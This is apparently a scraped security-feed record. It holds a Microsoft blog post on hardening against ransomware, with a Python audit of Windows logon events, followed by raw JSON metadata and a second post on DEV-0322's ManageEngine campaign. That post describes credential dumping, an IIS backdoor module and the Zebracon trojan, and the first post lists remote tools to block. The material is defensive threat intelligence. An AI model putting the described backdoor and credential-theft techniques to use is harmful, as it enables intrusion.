A durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks as well as detecting them. Ransomware attacks generate multiple, disparate security product alerts, but these can easily get lost or not be responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks.

Attackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven’t changed much over the years. Therefore, a renewed focus on prevention is needed to stem the tide.

Ransomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.

### Building credential hygiene

More than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment can then be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.

Credential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist in most security products for these tools accessing the LSASS process. However, the risk of credential exposure isn’t limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.

Too often, a legacy configuration ensures that a mission-critical application works by giving it the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can read.
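The exposure described above (privileged accounts left in LSASS by interactive and RDP logons, or in LSA Secrets by services and scheduled tasks) can be audited from Security log logon events alone, because the logon type recorded in event 4624 says which kind of secret the host now holds: type 2 (interactive), 10 (RemoteInteractive) and 4/5 (batch/service) all leave something reusable behind, whereas type 3 (network) does not. The following Python is an added example written for this page, not code from the original post or from Microsoft. It walks constructed 4624 and 4625 records in a hypothetical normalized layout; the privileged account set and the tier-0 host set are assumptions an organization would populate from its Domain Admins membership and domain controller inventory.

```python
"""Audit where privileged credentials are exposed to theft, using logon events.
Added example over constructed (made-up) Security log records; the field names
are a hypothetical normalisation, and PRIVILEGED / DOMAIN_CONTROLLERS are
assumed values to be populated from your own directory."""
from collections import defaultdict

# 4624 logon types that leave reusable secrets on the host: interactive and RDP
# logons cache the credential in LSASS; service and scheduled-task logons mean
# the password is stored in LSA Secrets so the host can start the job itself.
EXPOSING_LOGON_TYPES = {
    2: "interactive",
    4: "batch/scheduled task",
    5: "service",
    10: "RDP (RemoteInteractive)",
}
PRIVILEGED = {"corp\\da-jsmith", "corp\\svc-backup"}  # assumed Domain Admins members
DOMAIN_CONTROLLERS = {"DC01"}                          # assumed tier-0 hosts: DA logons expected


def account_key(event):
    """Normalise DOMAIN\\user for set lookups."""
    return f"{event['target_domain']}\\{event['target_user']}".lower()


def exposed_credentials(events, privileged=PRIVILEGED, tier0=DOMAIN_CONTROLLERS):
    """host -> sorted (account, logon-type label) pairs for privileged accounts
    whose logon left a stealable secret on a non-tier-0 host."""
    out = defaultdict(set)
    for e in events:
        if e["event_id"] != 4624 or e["host"] in tier0:
            continue
        label = EXPOSING_LOGON_TYPES.get(e["logon_type"])
        if label and account_key(e) in privileged:
            out[e["host"]].add((account_key(e), label))
    return {host: sorted(pairs) for host, pairs in out.items()}


def blast_radius(exposure):
    """Invert the view: for each privileged account, the hosts where a local
    admin (or a banking trojan running as one) is one hop from owning it."""
    out = defaultdict(set)
    for host, pairs in exposure.items():
        for account, _label in pairs:
            out[account].add(host)
    return {account: sorted(hosts) for account, hosts in out.items()}


def breakage_after_removal(events, removed):
    """4625 failures for accounts just pulled from privileged groups: these are
    the services and tasks that silently depended on the old privilege."""
    out = defaultdict(set)
    for e in events:
        if e["event_id"] == 4625 and account_key(e) in removed:
            out[account_key(e)].add(e["host"])
    return {account: sorted(hosts) for account, hosts in out.items()}


# Constructed sample events for this example (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 4624, "target_domain": "CORP", "target_user": "da-jsmith", "logon_type": 2},
    {"host": "WS01", "event_id": 4624, "target_domain": "CORP", "target_user": "jdoe", "logon_type": 2},
    {"host": "SRV02", "event_id": 4624, "target_domain": "CORP", "target_user": "svc-backup", "logon_type": 5},
    {"host": "SRV03", "event_id": 4624, "target_domain": "CORP", "target_user": "svc-backup", "logon_type": 4},
    {"host": "FS01", "event_id": 4624, "target_domain": "CORP", "target_user": "da-jsmith", "logon_type": 3},
    {"host": "DC01", "event_id": 4624, "target_domain": "CORP", "target_user": "da-jsmith", "logon_type": 10},
    {"host": "SRV03", "event_id": 4625, "target_domain": "CORP", "target_user": "svc-backup", "logon_type": 4},
]

if __name__ == "__main__":
    exposure = exposed_credentials(SAMPLE_EVENTS)
    for host, pairs in exposure.items():
        print(host, pairs)
    print("blast radius:", blast_radius(exposure))
    print("broke after removal:", breakage_after_removal(SAMPLE_EVENTS, {"corp\\svc-backup"}))
```

The network logon on FS01 and the RDP logon on the domain controller are deliberately not reported: the first leaves nothing behind to steal, and the second is where a Domain Admin is supposed to log on. The blast-radius view is the list to work down first, since every host on it is a place where local administrator rights convert directly into domain administrator rights.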
In organizations where local administrator rights haven’t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene means developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.

**Here are some steps organizations can take to build credential hygiene:**

 * Aim to run services as Local System when administrative privileges are needed, as this allows the application to have high privileges locally while on the network it authenticates only as the computer account rather than with a reusable user credential. Run services as Network Service when accessing other resources.
 * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.
 * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn’t be exposed on member servers or workstations.
 * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups, to find the services and tasks that still depend on them. Adding such accounts to the local Administrators group on a limited set of machines to keep an application running still reduces the scope of an attack compared with running them as Domain Admin.
 * Randomize local administrator passwords with a tool like [Local Administrator Password Solution (LAPS)](<https://aka.ms/laps>) to prevent lateral movement using local accounts with shared passwords.
 * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals to get visibility into identity configurations and to identify and detect threats or compromised identities.

### Auditing credential exposure

Auditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that maps administrative relationships and privilege escalation paths in an Active Directory environment, giving network defenders insight into how many accounts effectively hold administrative rights. It can also be a powerful tool in reducing privileges tied to administrative accounts and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.

Microsoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access to, to highly privileged accounts like domain admin accounts and Global Administrator accounts in Azure AD.

### Prioritizing deployment of Active Directory updates

Security patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities such as ZeroLogon and PetitPotam within one hour of their being made public, and especially as soon as those vulnerabilities are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.

### Cloud hardening

As attackers move towards cloud resources, it’s important to secure cloud resources and identities as well as on-premises accounts.
Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. 
Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA) prompts.\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. 
It\u2019s important to understand that the lack of security controls on these systems, which have access to highly privileged credentials, acts as a blind spot that allows attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. 
EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. 
In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list 
criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reducing the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment this data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if they are not in use in your environment. 
If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched or partially patched, or because access brokers had established persistence on a previously compromised system despite its later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * 
FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. 
To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we're introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&A. 
[Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mmpc", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "href": 
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2021-11-09T18:34:15", "description": "Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) in a targeted campaign. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.\n\nMSTIC previously highlighted DEV-0322 activity related to [attacks targeting the SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.\n\nOur colleagues at Palo Alto Unit 42 have also highlighted this activity in [their recent blog](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>). We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. We would also like to thank our partners in [Black Lotus Labs](<https://www.lumen.com/en-us/security/black-lotus-labs.html>) at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.\n\nThis blog shares what Microsoft has observed in the latest DEV-0322 campaign and informs our customers of protections in place through our security products. 
We have not observed any exploit of Microsoft products in this activity.\n\nMSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## Activity description\n\nMSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.\n\n### Credential dumping\n\nIn this campaign, DEV-0322 was observed performing credential dumping using the following commands:\n\n\n\nDEV-0322 also occasionally deployed a tool to specifically read security event logs and look for Event ID 4624 events. Next, their tool would collect domains, usernames, and IP addresses and write them to the file _elrs.txt_. They typically called this tool _elrs.exe_, and below is an example of how they would call it:\n\n\n\nAfter gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module with the following command:\n\n\n\n### Installing custom IIS module\n\nThe _gac.exe_ binary installs _ScriptModule.dll_ into the Global Assembly Cache before using _AppCmd.exe_ to install it as an IIS module. _AppCmd.exe_ is a command line tool included in IIS 7+ installations used for server management. 
This module hooks into the BeginRequest IIS HTTP event and looks for custom commands and arguments being passed via the Cookies field of the HTTP header.\n\n\n\n_Figure 1: Encoded request from the controller to the victim machine_\n\nThe custom IIS module supports execution of _cmd.exe_ and PowerShell commands. It also gives DEV-0322 the ability to download and upload files directly to and from a compromised IIS web server. The module also observes incoming authentication credentials and captures them; it then encodes these and writes them to the following path:\n\n_C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat_\n\nIf this module receives the command \u201cccc,\u201d it drops a file _c:\\windows\\temp\\ccc.exe_. The file _ccc.exe_ is a .NET program that launches _cmd.exe_ with an argument and sends any output back to the controller.\n\n\n\n_Figure 2: The Base64-encoded ccc.exe contained inside the IIS module backdoor_\n\nBelow is an example command from the _w3wp.exe_ process after _ccc.exe_ is dropped:\n\n`\"c:\\windows\\temp\\ccc.exe\" dir`\n\n### Deploying Zebracon malware\n\nIn addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.\n\nSubsequent commands are made to _<ZimbraServer>/service/soap_ using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:\n\n * Search email (e.g., _<query>(in:\\"inbox\\" or in:\\"junk\\") is:unread</query>_)\n * Read email\n * Send email (e.g., _Subject: [AutoReply] I've received your mail, I will check it soon!_)\n\nThese operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.\n\nFiles related to the Zebracon Trojan have the following metadata:\n\n * Company name: \n * Synacor. 
Inc.\n * File description: \n * Zimbra Soap Suites\n * Zimbra Soap Tools\n * Internal name: \n * newZimbr.dll\n * zimbra-controller-dll.dll\n * Original filename: \n * newZimbr.dll\n * ZIMBRA-SOAP.DLL\n\nMicrosoft will continue to monitor DEV-0322 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Detections\n\n### Microsoft 365 Defender detections\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Trojan:MSIL/Gacker.A!dha\n * Backdoor:MSIL/Kokishell.A!dha\n * Trojan:Win64/Zebracon.A!dha\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * DEV-0322 Actor activity detected\n * Malware from possible exploitation of CVE-2021-40539\n\nThe following alerts may also indicate activity associated with this threat. These alerts can be triggered by unrelated threat activity, but they are listed here for reference:\n\n * 'Zebracon' high-severity malware was detected\n * Anomaly detected in ASEP registry\n\nMicrosoft 365 Defender correlates any related alerts into [incidents](<https://docs.microsoft.com/microsoft-365/security/defender/investigate-incidents?view=o365-worldwide>) to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.\n\nThe threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. 
Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.\n\n### Microsoft Sentinel detections\n\nThe indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the _Microsoft Emerging Threat Feed_ located in the [Microsoft Sentinel Threat Intelligence blade](<https://docs.microsoft.com/azure/sentinel/understand-threat-intelligence>). These can be used by customers for detection purposes alongside the hunting queries detailed below.\n\n## Advanced hunting queries\n\n### Microsoft Sentinel hunting queries\n\n**Name**: DEV-0322 Command Line Activity November 2021 \n**Description**: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor's post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml>\n\n**Name**: DEV-0322 File Drop Activity November 2021 \n**Description**: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor\u2019s post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. 
